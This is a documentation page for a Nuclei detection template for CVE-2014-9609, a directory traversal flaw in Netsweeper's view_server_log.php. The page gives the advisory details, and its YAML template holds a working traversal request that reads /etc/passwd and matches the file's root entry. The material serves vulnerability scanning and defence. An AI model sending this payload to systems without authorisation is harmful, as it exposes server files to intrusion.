Netsweeper 4.0.8 - Directory Traversal
ID: CVE-2014-9609
Severity: medium
Author: daffainfo
Tags: cve2014,cve,netsweeper,lfi,packetstorm,xss
Description
Section titled “Description”A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
YAML Source
Section titled “YAML Source”id: CVE-2014-9609
info: name: Netsweeper 4.0.8 - Directory Traversal author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. impact: | An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00153 epss-percentile: 0.51564 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netsweeper product: netsweeper tags: cve2014,cve,netsweeper,lfi,packetstorm,xss
http: - method: GET path: - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100bc95a39f3c2d7c8aecf97397dd77c09e30b1f67dcdab91bc006a9a02777c41a3022100fbdd4548e22bf7e6fbb4d5d0272cd2b5be82bbe3ad52422cdf863e3378dc2eae:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-9609.yaml"